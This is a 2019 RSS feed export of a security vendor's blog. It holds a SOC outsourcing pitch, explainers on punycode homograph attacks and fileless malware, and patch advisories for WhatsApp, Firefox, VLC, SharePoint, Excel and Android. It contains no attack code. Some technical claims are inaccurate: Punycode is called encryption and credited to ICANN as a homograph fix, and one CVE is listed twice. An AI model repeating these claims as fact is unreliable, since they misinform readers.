Cyberon Security https://cyberonsecurity.com/ Protecting your business and your people Tue, 10 Sep 2019 13:23:49 +0000 en-US hourly 1 https://wordpress.org/?v=5.2.3 SOC – what is it and why do you need it? https://cyberonsecurity.com/2019/09/10/soc-what-is-it-and-why-do-you-need-it/ https://cyberonsecurity.com/2019/09/10/soc-what-is-it-and-why-do-you-need-it/#respond Tue, 10 Sep 2019 13:23:47 +0000 https://cyberonsecurity.com/?p=6508 A security operation center (SOC) is a centralized function that deals with security issues of an organization on a technical level. A team of professionals with expertise in information technology and information security is responsible for monitoring and improving the organizations security posture while preventing, detecting, analyzing and responding to the information security incidents. It […]

The post SOC – what is it and why do you need it? appeared first on Cyberon Security.

]]>
A security operation center (SOC) is a centralized function that deals with security issues of an organization on a technical level. A team of professionals with expertise in information technology and information security is responsible for monitoring and improving the organizations security posture while preventing, detecting, analyzing and responding to the information security incidents.

It is comprised of a dedicated team of security analysts working together to monitor and shutdown security threats depending on the company and its requirements. It may also include team members with specific skills in digital forensic analysis, cryptanalysis, malware reverse engineering, and more.

Security operations teams are charged with monitoring and protecting many assets, such as intellectual property, personnel data, business systems, and brand integrity. Consumers and employees alike want to know their information will be safe once they offer it to their company of choice. Taking strict measures to prevent data loss is one of the best ways to improve and maintain brand integrity in the long run.

Forming a SOC has become more important for organizations as security breaches are on the rise and the cost associated with data loss is often high. An effective SOC not only helps to minimize the cost of a data breach or an attack by responding to intrusions quickly, but also by constantly improving detection and prevention practices.

A SIEM (Security Incident and Event Management) system can include dozens of tools and processes to track and maintain security, such as:

  • Data correlation from network discovery (data flows, telemetry, packets, syslog, etc.)
  • Firewalls and antivirus detection
  • Cyber threat intelligence
  • Vulnerability and penetration tests
  • Website assessment
  • Database scanners
  • Intrusion detection systems (IDS)
  • Intrusion prevention systems (IPS)
  • Log management systems
  • Governance and compliance systems

There are a few standard models SOCs typically fit into, from internally centralized structures to those that run remotely. Internal SOC, Internal virtual SOC, Co-managed SOC, Command SOC and Fusion SOC are few of them, but Outsourced virtual SOC is a trending and very popular solution for so many reasons. Here are few reasons why you should outsource your SOC/SIEM.

Finding and maintaining talented SIEM/SOC team is expensive.

Deploying SIEM and SOC locally requires you to hire a new employees who is 100% up to date with the security industry. Mostly, you do this because your current team doesn’t have much experience in the InfoSec area. Unfortunately, finding a single talented person to address all SIEM /SOC related issues can be a complete nightmare. Even if you opt to hire a bunch of security experts, it will be difficult to keep them in-house due to the high costs of their salaries. Although security important, most organizations have a limited budget and outsourcing the SIEM/SOC is a good bet.

Outsourcing lowers the Risk of conflict of interest between departments

Your organization’s departments know the expectations and implications of outsourced SIEM and SOC beforehand. These include the top-level management and financing departments. Therefore, it will be easy to project future requirements for the new service including budgeting.

Contrary to this, locally deployed SIEM is dynamic in nature as the department undergoes a “learning curve”. As your new security team masters the industry, their demands could choke the other departments, and this might lead to a conflict of interests between the units.

A good example is when the security team insists on purchasing new costly technology when the company is strapped for cash. This might cause a problem because failing to comply with the team’s requirements could lead to an incomplete SOC, which in turn could be comprised.

Benefit of trends and detection on other customers

Outsourced SOC takes advantage of optimized services based on trends and detection of other customers. Designing your own personal In-house SIEM requires you to re-invent the wheel and it’s an extremely hard and very expensive task to even come closer to the level which a good experienced MSSP’s are providing.

Why on earth would you want to duplicate a service that has already been created and optimized by geniuses and security geeks? Of course, this would be a sheer waste of time. Furthermore, since your local security center relies on a limited set of data, you can’t get the most when it comes to detecting intrusion

Enhancing efficiency in order to concentrate on your primary business

Your goal in a business is to get more customers and increase profitability while reducing costs at the same time. Have you ever asked yourself whether you are getting enough time to concentrate on your core business? If you haven’t, it’s time to change your investment strategies.

Engaging your local staff with SOC related tasks makes them less productive. This means they will have to dedicate a certain amount of time on security matters and leave their primary focus. This means you will be spending a lot of money to pay their salaries, but your overall business efficiency will be lower.

Why not offload that burden to a reputable MSSP? This will ensure that all your employees are tasked with duties inside the scope of your business. This will improve productivity by far and your company can even harness great talents. Remember your employees will acquire new experience when working on specific projects without distraction.

Scalability and flexibility

MSSP provides services based on features or levels. For example, a SOC may have a primary, advanced and a professional packages. In simple terms, they are doing this to cater for different levels of businesses.

For instance, your start-up company may require only a single security expert working for a few hours a day. When you outsource the service, your MSSP will pool your needs and those of others to hire a full-time team. You can later scale up and get another plan as your business grows.

This leads to flexibility as you only pay for what you require. The same analogy is used by web hosts. They offer shared hosting for start-ups, virtual private servers for middle-class companies and dedicated bare-metal servers for big companies.

Accessing more threat intelligence

MSSP has tons of threat data and the good news is that you can transform it into something actionable. For instance, if there is a new vulnerability or possible exploits on your servers, MSSP intelligence will recommend a way to patch your system. Sometimes, they may even suggest new ways to mitigate possible losses which is just what your business needs.

MSSP intelligence is more focused and leads to proper insights that are useful to your security challenges. Also, previous intelligence data collected over time is very helpful in creating a better layer to deal with a threat surface. Security threats are agile, so your SOC must be ready to stay up to date on security intelligence to continuously improve detection and defense. If your team’s resources are concentrated on other priorities, it may be wise to leverage an MSSP to manage your SOC.

Cyberon has its own SOC service named CENTRY which is designed to meet your needs regardless of size and complexity. Our solution is purely powered by open source which makes it dynamic and independent of your hardware, software or other security systems. We integrate with everything and everyone, totally seamless in your environment. Get notified proactively and reactively on potential threats by security professionals, guiding or solving the issues for you.

  1. https://www.gartner.com/en/newsroom/press-releases/2017-10-12-security-operations-centers-and-their-role-in-cybersecurity
  2. https://searchsecurity.techtarget.com/definition/Security-Operations-Center-SOC
  3. https://www.blackstratus.com/what-is-a-security-operations-center-and-why-is-it-important/
  4. https://www.mcafee.com/enterprise/en-us/security-awareness/operations/what-is-soc.html
  5. https://www.alienvault.com/resource-center/ebook/building-a-soc/soc-team
  6. https://www.scarlettculture.com/blog/7-reasons-why-siem-and-soc-should-be-100-outsourced

The post SOC – what is it and why do you need it? appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/09/10/soc-what-is-it-and-why-do-you-need-it/feed/ 0
Punycode Attacks https://cyberonsecurity.com/2019/08/21/punycode-attacks/ https://cyberonsecurity.com/2019/08/21/punycode-attacks/#respond Wed, 21 Aug 2019 11:45:00 +0000 https://cyberonsecurity.com/?p=6427 How and Why The original Internet was ASCII only, which isn’t really surprising, as it was built in the United States, and English is a language that can be written entirely in characters in the ASCII set.[1] Punycode is a system for converting words that can’t be written in ASCII (American Standard Code for Information […]

The post Punycode Attacks appeared first on Cyberon Security.

]]>
How and Why

The original Internet was ASCII only, which isn’t really surprising, as it was built in the United States, and English is a language that can be written entirely in characters in the ASCII set.[1] Punycode is a system for converting words that can’t be written in ASCII (American Standard Code for Information Interchange) such as Ancient Greek, Armenian, Cyrillic or Chinese alphabets.

This conversion method is very useful in DNS (Domain Name System) because DNS which is responsible for converting domain names in to IP addresses is only capable of recognizing ASCII characters in domain names.

Using this conversion method international domain names (IDNs) which uses non-ASCII characters can be displayed only using Roman letters from A to Z, numbers from 0 to 9 and “- “character.

The Punycode method was created so that languages with a wider set of characters, could also use the DNS. Basically, Punycode is an encryption method that converts Unicode characters used by IDNs into ASCII characters.

What has changed

Years ago, ICANN allowed Unicode characters to be included in web domains and it didn’t take much time for them to realize that this decision is going to make problems as certain characters from different languages can be confused for Unicode since they look the same when rendered in the browser.

Some of the letters in the Roman alphabet are the same shape as letters in the Greek, Cyrillic and other alphabets. Examples are: the letters I, E, A, Y, T, O and N.

All of us check the green color padlock when browsing specially when we are purchasing something or doing banking because it lets us know that the site has TLS encryption, and no one will be able to eavesdrop on any data we submit. But it’s possible for an attacker to display that green color padlock and imitate a legitimate URL. Using this method an attacker could obtain a victim’s credentials or sensitive information very easily.

To counteract the issue, ICANN developed ‘Punycode’ as a way of specifying actual domain registrations by representing Unicode within the limited character subset of ASCII used for internet host names. The idea was that browsers would first read the Punycode URL and then transform it into displayable Unicode characters inside the browser.[4] Also, modern web browsers have introduced built in addons filters to render URLs in Punycode instead of Unicode.

The dangers of punycode

But researchers have found that if the whole domain name is in a one foreign language some browsers will render it in that language rather than in Punycode and this is considered as a loophole in Punycode and can be used as an attack vector. Cybercriminals leverage this feature of Punycode, using foreign characters to create unique domains that when rendered, look like well-known English URLs.

Try it yourself

Test it on your own browser. Copy and Paste xn--80ak6aa92e.com into the Address Bar of your browser and press ENTER. [5]

If your browser is displaying apple.com with a security certificate your browser is vulnerable for homograph attack. So, it’s a must to keep your browser up to date as these defense mechanisms will be included in security patches.

Although this particular attack may not directly impact a large number of individuals or organizations, it does serve as two important reminders. First, that there’s a lot of very intelligent people who are quite capable of creating new phishing and malware attacks that will successfully penetrate our systems, and that will never change. Second, organizations must aggressively and continuously upgrade their defenses to thwart the advanced attacks that will surely come.[6]

  1. https://www.symantec.com/connect/blogs/bad-guys-using-internationalized-domain-names-idns
  2. https://randed.com/punycode-attack/?lang=en
  3. https://securityintelligence.com/beware-of-the-latest-punycode-attacks/
  4. https://fraudwatchinternational.com/expert-explanations/punycode-phishing-part-1/
  5. https://www.xudongz.com/blog/2017/idn-phishing/
  6. https://www.lastline.com/blog/punycode-cyberattack/

The post Punycode Attacks appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/08/21/punycode-attacks/feed/ 0
Fileless Malware https://cyberonsecurity.com/2019/08/06/fileless-malware/ https://cyberonsecurity.com/2019/08/06/fileless-malware/#respond Tue, 06 Aug 2019 10:04:51 +0000 https://cyberonsecurity.com/?p=6419 Fileless malware is a type of malicious software that uses legitimate programs to infect a computer. It does not rely on files and leaves no footprint, making it challenging to detect and remove. Fileless malware emerged in 2017 as a mainstream type of attack, but many of these attack methods have been around for a […]

The post Fileless Malware appeared first on Cyberon Security.

]]>
Fileless malware is a type of malicious software that uses legitimate programs to infect a computer. It does not rely on files and leaves no footprint, making it challenging to detect and remove. Fileless malware emerged in 2017 as a mainstream type of attack, but many of these attack methods have been around for a while. Fileless malware is sometimes considered synonymous with in-memory malware as both perform their core functionalities without writing data to disk during the lifetime of their operation.

Not like the traditional malwares, fileless malware attacks do not have any executable files or software to get installed in the victims device. In another word we can say windows is turned against itself.

Fileless malware attacks involve taking default Windows tools, especially PowerShell and Windows Management Instrumentation (WMI), and utilizing them for malicious actions, such as moving along the side to different machines.

These power shell and WMI tools are pre-installed in every windows machine and capable of doing automated tasks. For an example power shell can provide access to windows inner core and the windows API.

Using legitimate programs makes these attacks nearly undetectable by most security programs and even skilled security analysts. The reason is simple: since PowerShell and WMI are legitimate programs, any command they execute is assumed to also be legitimate.

The initial infection usually involves tricking the user into opening an infected file or visiting a malicious website. Although this is typical from malware attacks, the payload will not create files on the device’s hard-drive but instead it will reside only in memory.

The next stage of the attack varies but often includes attempting to create entries in the device’s registry for persistency or attempting to load commonly used processes such as PowerShell or Windows Management Instrumentation (WMI).

Afterwards, the infected machine may attempt to propagate onto other connected devices, attempt to download additional malware on the infected device, and attempt to download and execute scripts.

Potential Infection Vectors

  1. Physical transfer
    Attack vector: A user connects an infected device or media into a device.
  2. Social Engineering (Phishing)
    1. Infected links
      Attack vector: A user interacts with a link to a malicious website in an email.
    2. Infected attachments
      Attack vector: A user interacts with a link to a malicious website in a document.
  3. Web application
    Attack vector: A malicious actor leverages a weakness in a website to inject and execute code on any user that happens to visit the website.

Potential Mitigations

  1. Patch and upgrade management, including staying up to date with vendor issued security advisories and application releases.
  2. Architect a layered IT defense environment including hardening of end points and disabling non-essential applications and services.
  3. Strong user awareness including encouraging users to report suspicious activity and implementing cyber security training.
  4. Log management including regular reviews of system logs, server logs and performing regular audits.

References

https://www.mcafee.com/enterprise/en-sg/security-awareness/ransomware/what-is-fileless-malware.html

https://en.wikipedia.org/wiki/Fileless_malware

https://cyber.gc.ca/en/alerts/fileless-malware-advisory


Like to get notified of security news by our Security Specialists? Sign up to our newsletter:

The post Fileless Malware appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/08/06/fileless-malware/feed/ 0
Public servers makes you a target https://cyberonsecurity.com/2019/08/01/public-servers-makes-you-a-target/ https://cyberonsecurity.com/2019/08/01/public-servers-makes-you-a-target/#respond Thu, 01 Aug 2019 11:31:41 +0000 https://cyberonsecurity.com/?p=6409 Different servers do different jobs Everything from serving email and video to protecting internal networks and hosting Web sites. E.g.: Mail servers, web servers, Application servers, FTP server, Collaboration Servers, Proxy servers etc. Exposing these servers to the internet without following the security best practices is not the best thing you can do as they […]

The post Public servers makes you a target appeared first on Cyberon Security.

]]>
Different servers do different jobs

Everything from serving email and video to protecting internal networks and hosting Web sites. E.g.: Mail servers, web servers, Application servers, FTP server, Collaboration Servers, Proxy servers etc.

Exposing these servers to the internet without following the security best practices is not the best thing you can do as they will be frequently targeted by attackers for various reasons and the confidentiality integrity and the availability could be lost.

As a result of these intrusions an organization will lose reputation, customers, time, money and data. So, it is strictly advised to follow the security best practices, have a security plan and a policy for implementing it and monitoring its effectiveness and updating it as needed.

How to secure your servers

Before setting up a new server it is paramount to have a good deployment plan as it’s hard to address the security issues after the implementation. The use of a different set of security features available from firewalls or dedicated systems can and should be implemented:

  • Intrusion Detection Systems (IDS): Analyze and monitor network traffic for signs that indicate attackers are using a known cyberthreat to infiltrate or steal data from your network. IDS systems compare the current network activity to a known threat database to detect several kinds of behaviors like security policy violations, malware, and port scanners.
  • Intrusion Prevention Systems (IPS): IPS lives in the same area of the network as a firewall, between the outside world and the internal network. IPS proactively deny network traffic based on a security profile if that packet represents a known security threat.
  • Segmentation: Traditional networks are designed to be “crunchy on the outside and soft on the inside.” If someone gets through that perimeter (the crunchy surface), they’ll find a flat network infrastructure (the soft insides). Because most detective tools are externally focused, and not looking at what’s going on inside, the unwelcomed guest will have free range to perpetrate an attack. It’s also an obstacle for insiders because you can isolate sensitive data and systems from “curious” insiders.
  • Network Access Control (NAC): A NAC system can deny network access to noncompliant devices, place them in a quarantined area, or give them only restricted access to computing resources, thus keeping insecure nodes from infecting the network.
  • Proxy: A proxy can keep the internal network structure of a company secret by using network address translation, which can help the security of the internal network. This makes requests from machines and users on the local network anonymous.
  • WAF: A web application firewall (WAF) is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection.

While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application too.

Larger companies and high value targets should also consider implementing a DDoS service. These are usually high cost solutions but protects against targeted DDoS attacks which can take down your servers and internet connection.

How do you really know you are under attack?

Cyber criminals are always on the look out for easy targets and their preferred method is stealth, which means you have to always monitor for any irregularities. This is usually a full time job as you need to analyze information from a broad range of systems and act on suspicious activity. Depending on the size of your company there are several sources to get relevant information from: firewalls, antivirus, O365, syslogs, mobile phones, password managers, routers etc. This information needs to be sorted and sifted through in order to pick the relevant information connected to intruders. If you have the resources it can be done by implementing a SIEM solution which can receive all the information and let you analyze it in real time. Alternatively you can outsource to more advanced type of SOC services like our own Centry solution operated by security specialists.

If you are unsure on how to proceed in securing your environment, please contact us and we can help you get started or build your system from the ground up if needed.

Cyberon Security SOC Services

The post Public servers makes you a target appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/08/01/public-servers-makes-you-a-target/feed/ 0
WhatsApp Remote Code Execution (RCE) Vulnerability https://cyberonsecurity.com/2019/07/31/whatsapp-remote-code-execution-rce-vulnerability/ https://cyberonsecurity.com/2019/07/31/whatsapp-remote-code-execution-rce-vulnerability/#respond Wed, 31 Jul 2019 12:28:41 +0000 https://cyberonsecurity.com/?p=6403 From Alert Attackers could remotely install surveillance malware on smartphones by simply calling the targeted phone. The WhatsApp call doesn’t even have to be answered and the spyware will erase the call logs from the devise, so the victim won’t be able to trace the attacker back. Description Remote code execution vulnerability has been discovered […]

The post WhatsApp Remote Code Execution (RCE) Vulnerability appeared first on Cyberon Security.

]]>
From Alert

Attackers could remotely install surveillance malware on smartphones by simply calling the targeted phone. The WhatsApp call doesn’t even have to be answered and the spyware will erase the call logs from the devise, so the victim won’t be able to trace the attacker back.

Description

Remote code execution vulnerability has been discovered on WhatsApp which can be exploited by sending malicious packets to a targeted phone number. This vulnerability allows attackers to compromise devices using an advanced version of Pegasus spyware.
This is a buffer overflow vulnerability in WhatsApp VOIP (Voice over Internet Protocol) stack. An attacker would need to call a target and send rigged Secure Real-time Transport Protocol (SRTP) packets to the phone, allowing them to use the memory flaw in WhatsApp’s VOIP function to inject the spyware and control the device.

Affected Versions

• WhatsApp for Android prior to v2.19.134,
• WhatsApp Business for Android prior to v2.19.44,
• WhatsApp for iOS prior to v2.19.51,
• WhatsApp Business for iOS prior to v2.19.51,
• WhatsApp for Windows Phone prior to v2.18.348 and
• WhatsApp for Tizen prior to v2.18.15.

Impact

• Stealing sensitive information
• Remote code execution

Recommended actions

The patch was released on 13th May and all the users are advised to upgrade to the latest version of WhatsApp ASAP.
This can be done by updating the app through Google Play or the App Store.

More information and reference:

The post WhatsApp Remote Code Execution (RCE) Vulnerability appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/whatsapp-remote-code-execution-rce-vulnerability/feed/ 0
Firefox Zero-Day Vulnerability https://cyberonsecurity.com/2019/07/31/firefox-zero-day-vulnerability/ https://cyberonsecurity.com/2019/07/31/firefox-zero-day-vulnerability/#respond Wed, 31 Jul 2019 12:25:42 +0000 https://cyberonsecurity.com/?p=6396 Systems Affected Firefox Firefox ESR Threat Level High Overview Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.[1] Description A type confusion vulnerability can occur when manipulating JavaScript […]

The post Firefox Zero-Day Vulnerability appeared first on Cyberon Security.

]]>

Systems Affected

  • Firefox
  • Firefox ESR

Threat Level

High

Overview Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.[1]

Description

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.[2] The vulnerability identified as CVE-2019-11707 affects anyone who uses Firefox on desktop (Windows, macOS, and Linux) — whereas, Firefox for Android, iOS, and Amazon Fire TV are not affected.

Impact

The vulnerability could allow attackers to remotely execute arbitrary code on machines running vulnerable Firefox versions and take full control of them.

Solution

Mozilla has released Firefox 67.0.3 and Firefox ESR 60.7.1 versions to patch the vulnerability. Apply the necessary updates. Ensure you are running the latest Firefox 67.0.3 and Firefox ESR (Extended Support Release) 60.7.1 or later.

Reference

[1] https://www.us-cert.gov/ncas/current-activity/2019/06/18/Mozilla-Releases-Security-Updates-Firefox-and-Firefox-ESR [2] https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/ [3] https://thehackernews.com/2019/06/mozilla-firefox-patch-update.html?m=1

Disclaimer

The information provided herein is on “as is” basis, without warranty of any kind.

The post Firefox Zero-Day Vulnerability appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/firefox-zero-day-vulnerability/feed/ 0
VLC Vulnerability – Read buffer overflow & double free https://cyberonsecurity.com/2019/07/31/vlc-vulnerability-read-buffer-overflow-double-free/ https://cyberonsecurity.com/2019/07/31/vlc-vulnerability-read-buffer-overflow-double-free/#respond Wed, 31 Jul 2019 12:23:31 +0000 https://cyberonsecurity.com/?p=6392 Systems Affected VLC media player 3.0.6 and earlier Summary : Read buffer overflow & double free Date : June 2019 Affected versions : VLC media player 3.0.6 and earlier ID : VideoLAN-SA-1901 CVE reference : CVE-2019-5439, CVE-2019-12874 Threat Level High Overview A remote user can create some specially crafted avi or mkv files that, when […]

The post VLC Vulnerability – Read buffer overflow & double free appeared first on Cyberon Security.

]]>

Systems Affected

  • VLC media player 3.0.6 and earlier
Summary           : Read buffer overflow & double free
Date              : June 2019
Affected versions : VLC media player 3.0.6 and earlier
ID                : VideoLAN-SA-1901
CVE reference     : CVE-2019-5439, CVE-2019-12874

Threat Level

High

Overview

A remote user can create some specially crafted avi or mkv files that, when loaded by the target user, will trigger a heap buffer overflow (read) in ReadFrame (demux/avi/avi.c), or a double free in zlib_decompress_extra() (demux/mkv/utils.cpp) respectively.[1]

Description

If you use VLC media player on your computer and haven’t updated it recently, don’t you even dare to play any untrusted, randomly downloaded video file on it. Doing so could allow hackers to remotely take full control over your computer system. That’s because VLC media player software versions prior to 3.0.7 contain two high-risk security vulnerabilities, besides many other medium- and low-severity security flaws, that could potentially lead to arbitrary code execution attacks. [2]

Impact

If successful, a malicious third party could trigger either a crash of VLC or an arbitratry code execution with the privileges of the target user.

Solution

VLC media player 3.0.7 addresses the issues. This release also fixes an important security issue that could lead to code execution when playing an AAC file.

Apply the necessary updates. Ensure you are running the latest version of VLC.

 

Reference

[1] https://www.videolan.org/security/sa1901.html

[2] https://thehackernews.com/2019/06/vlc-media-player-hacking.html

Credits

The MKV double free vulnerability was reported by Symeon Paraschoudis from Pen Test Partners

Disclaimer

The information provided herein is on “as is” basis, without warranty of any kind.

The post VLC Vulnerability – Read buffer overflow & double free appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/vlc-vulnerability-read-buffer-overflow-double-free/feed/ 0
Stored XSS in Microsoft Office SharePoint https://cyberonsecurity.com/2019/07/31/stored-xss-in-microsoft-office-sharepoint/ https://cyberonsecurity.com/2019/07/31/stored-xss-in-microsoft-office-sharepoint/#respond Wed, 31 Jul 2019 12:21:52 +0000 https://cyberonsecurity.com/?p=6390 Systems Affected Microsoft SharePoint Server 2019 Summary : Stored XSS in Microsoft Office SharePoint Date : June 2019 Affected versions : Microsoft SharePoint Server 2019 CVE reference : CVE-2019-1134 Threat Level Medium Overview The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of user-supplied […]

The post Stored XSS in Microsoft Office SharePoint appeared first on Cyberon Security.

]]>

Systems Affected

  • Microsoft SharePoint Server 2019
Summary           : Stored XSS in Microsoft Office SharePoint
Date              : June 2019
Affected versions : Microsoft SharePoint Server 2019
CVE reference     : CVE-2019-1134

Threat Level

Medium

Overview

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of user-supplied data. A remote authenticated attacker can permanently inject and execute arbitrary HTML and script code in user’s browser in context of vulnerable website. [1]

Description

A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. [2]

Impact

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

Solution

We currently unaware of any official solution to address this vulnerability.

Reference

[1] https://www.cybersecurity-help.cz/vdb/SB2019062801

[2] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1134

Credits

Sharepoint XSS vulnerability was reported by Huynh Phuoc Hung (@hph0var)

Disclaimer

The information provided herein is on “as is” basis, without warranty of any kind.

The post Stored XSS in Microsoft Office SharePoint appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/stored-xss-in-microsoft-office-sharepoint/feed/ 0
Microsoft Office’s Excel Attack Vector https://cyberonsecurity.com/2019/07/31/microsoft-offices-excel-attack-vector/ https://cyberonsecurity.com/2019/07/31/microsoft-offices-excel-attack-vector/#respond Wed, 31 Jul 2019 12:18:42 +0000 https://cyberonsecurity.com/?p=6384 SYSTEMS AFFECTED Microsoft Office 2016 and older: Excel running Power Query THREAT LEVEL High OVERVIEW Microsoft Excel called Power Query to dynamically launch a remote Dynamic Data Exchange (DDE) attack into an Excel spreadsheet and actively control the payload Power Query. A feature in Microsoft Office’s Excel spreadsheet program called Power Query can be exploited […]

The post Microsoft Office’s Excel Attack Vector appeared first on Cyberon Security.

]]>
SYSTEMS AFFECTED

Microsoft Office 2016 and older:

  • Excel running Power Query

THREAT LEVEL

High

OVERVIEW

Microsoft Excel called Power Query to dynamically launch a remote Dynamic Data Exchange (DDE) attack into an Excel spreadsheet and actively control the payload Power Query.

A feature in Microsoft Office’s Excel spreadsheet program called Power Query can be exploited to plant malware on remote systems. Researchers at Mimecast Threat Center say they have developed a proof-of-concept attack scenario and reported the vulnerability last month.

DESCRIPTION

A feature in Microsoft Office’s Excel spreadsheet program called Power Query can be exploited to plant malware on remote systems. Researchers at Mimecast Threat Center say they have developed a proof-of-concept attack scenario and reported the vulnerability Thursday.

The exploitable feature in Excel, called Power Query, allows users to embed outside data sources such as external databases or web-based data into a spreadsheet. Mimecast threat center have developed a technique to launch a remote Dynamic Data Exchange (DDE) attack into an Excel spreadsheet, deliver a malicious payload and actively control the payload via Power Query. researchers say in older versions of Microsoft Excel 2010 the payload is automatically executed, no user interaction needed.

IMPACT

Successful exploitation of the DDE feature could allow attackers to perform remote code execution and take control of the affected systems to perform malicious activities, such as unauthorised installation of programmes, creating rogue administrator accounts, and being able to view, change, or delete data.

SOLUTION

Microsoft has published an advisory (https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440) on mitigation measures for DDE-related attacks. Users are recommended to apply the mitigation measures immediately.

REFERENCE

  1. https://threatpost.com/microsoft-excel-attack-vector/146062/
  2. https://www.mimecast.com/blog/2019/06/exploit-using-microsoft-excel-power-query-for-remote-dde-execution-discovered/
  3. https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440
  4. https://www.csa.gov.sg/singcert/news/advisories-alerts/microsoft-office-excel-attack-vector

CREDITS

The Mimecast Threat Center

DISCLAIMER

The information provided herein is on “as is” basis, without warranty of any kind.

The post Microsoft Office’s Excel Attack Vector appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/microsoft-offices-excel-attack-vector/feed/ 0
Android Patches 33 New Security Vulnerabilities https://cyberonsecurity.com/2019/07/31/android-patches-33-new-security-vulnerabilities/ https://cyberonsecurity.com/2019/07/31/android-patches-33-new-security-vulnerabilities/#respond Wed, 31 Jul 2019 12:16:19 +0000 https://cyberonsecurity.com/?p=6378 SYSTEMS AFFECTED Android devices THREAT LEVEL High OVERVIEW Google has started rolling out this month’s security updates for its mobile operating system platform to address a total of 33 new security vulnerabilities affecting Android devices, 9 of which have been rated critical in severity. DESCRIPTION This bulletin has two security patch levels. At the basic […]

The post Android Patches 33 New Security Vulnerabilities appeared first on Cyberon Security.

]]>
SYSTEMS AFFECTED
  • Android devices

THREAT LEVEL

  • High

OVERVIEW

Google has started rolling out this month’s security updates for its mobile operating system platform to address a total of 33 new security vulnerabilities affecting Android devices, 9 of which have been rated critical in severity.

DESCRIPTION

This bulletin has two security patch levels. At the basic 2019-07-01 level, 12 bugs are addressed.

  • Five remote code execution vulnerabilities.
  • Three (CVE-2019-2106, CVE-2019-2107, CVE-2019-2100) in the Android media framework.
  • CVE-2019-2105 is in Android Library
  • CVE-2019-2105 is found in the System.

All would be triggered by opening a specially-crafted file.

  • CVE-2019-2104 in Framework
  • CVE-2019-2116, CVE-2019-2117, CVE-2019-2118 and CVE-2019-2119 in System are for information disclosure bugs.
  • CVE-2019-2112, CVE-2019-2113 are elevation of privilege vulnerabilities.
  • Ten of the closed-source component CVEs were for issues rated as High security risks. this means things like elevation of privilege and information disclosure flaws.
  • Another three were classified as critical, means a remote code execution vulnerability that requires little to no user interaction to exploit.
  • CVE-2019-2308 in DSP Services and CVE-2019-2330 in Kernel were classified as critical.
  • The other six were labeled high severity and were found in WLAN Host

(CVE-2019-2276, CVE-2019-2307), WLAN Driver (CVE-2019-2305), HLOS (CVE-2019-2278), and Audio (CVE-2019-2326, CVE- 2019-2328).

IMPACT

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

SOLUTION

Check and update your android version

REFERENCE

  1. https://source.android.com/security/bulletin/2019-07-01
  2. https://www.bleepingcomputer.com/news/security/july-android-security-update-fixes-four-critical-rce-flaws/
  3. https://www.theregister.co.uk/2019/07/01/july_android_fixes/
  4. https://thehackernews.com/2019/07/android-security-update.html

CREDITS

@Android

DISCLAIMER

The information provided herein is on “as is” basis, without warranty of any kind.

The post Android Patches 33 New Security Vulnerabilities appeared first on Cyberon Security.

]]>
https://cyberonsecurity.com/2019/07/31/android-patches-33-new-security-vulnerabilities/feed/ 0